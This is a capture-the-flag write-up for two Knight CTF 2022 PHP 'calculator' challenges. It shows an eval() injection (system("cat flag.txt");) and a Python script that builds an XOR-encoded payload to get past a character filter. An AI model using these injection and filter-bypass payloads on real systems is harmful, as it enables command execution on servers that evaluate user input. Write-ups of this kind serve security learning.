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Knight CTF 2022 – Most Secure Calculator

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    A Vocaloid (and other singing synth) fan.

Most Secure Calculator 1 (50 points)

Challenge Link:
Flag Format: KCTF{something_here}
Note: Burte Force/Fuzzing not required and not allowed.
Author: NomanProdhan

Webpage has a form with a text box and a submit button. The form sends a POST request to /.

A comment is found in the HTML source of the webpage.

    Hi Selina, 
    I learned about eval today and tomorrow I will learn about regex. I have build a calculator for your child.
    I have hidden some interesting things in flag.txt and I know you can read that file.
  • The webpage uses eval to “do calculations”.
  • Flag is stored in flag.txt.

Submit system("cat flag.txt"); to get the flag.

Most Secure Calculator 2 (250 points)

Challenge Link:
Flag Format: KCTF{something_here}
Note: Burte Force/Fuzzing not required and not allowed.
Author: NomanProdhan

Webpage has a form with a text box and a submit button. The form sends a POST request to /.

A comment is found in the HTML source of the webpage.

    Hi Selina, 
    I learned about regex today. I have upgraded the previous calculator. Now its the most secure calculator ever.
    The calculator accepts only numbers and symbols. 
    I have hidden some interesting things in flag.txt and I know you can create an interesting equation to read that file.


  • The webpage uses eval to “do calculations”.
  • Filters are put in place to only accept “numbers and symbols”.
  • Flag is stored in flag.txt.

Through trial and error, the following characters are found to be accepted:


Specifically, $, < and > are not accepted.


  1. PHP allows to use a string literal as a function name.
  2. PHP allows bit-wise XOR operation of strings.

Making use of feature 1, we can rewrite system("cat flag.txt"); as ("system")("cat flag.txt");.

Making use of feature 2, we can construct the words system, cat, flag, and txt using bit-wise XOR of 2 strings from the allowed character set.

For example, to construct the word 'sekai', we can have '(%+!)' ^ '[@@@@'.

(%+!)   00101000 00100101 00101011 00100001 00101001
[@@@@   01011011 01000000 01000000 01000000 01000000
sekai   01110011 01100101 01101011 01100001 01101001

A Python script was written to find the XOR pairs and build the payload.

chars = "!#%()*+,-./:;?@[]^_`{|}~&0123456789"
ascii_chars = "".join(chr(i) for i in range(32, 127))
diff = (set(ascii_chars) - set(chars))
mapping = {}

for i in chars:
    for j in chars:
        k = chr(ord(i) ^ ord(j))
        if k in diff and k not in mapping:
            mapping[k] = (i, j)

def transform(s):
    a = [mapping[c][0] for c in s]
    b = [mapping[c][1] for c in s]
    return "("+repr("".join(a)) + "^" + repr("".join(b))+")"

_system = transform("system")
_cat = transform("cat")
_flag = transform("flag")
_txt = transform("txt")

print(f"{_system}({_cat}.' '.{_flag}.'.'.{_txt});")

Submit this payload to get the flag.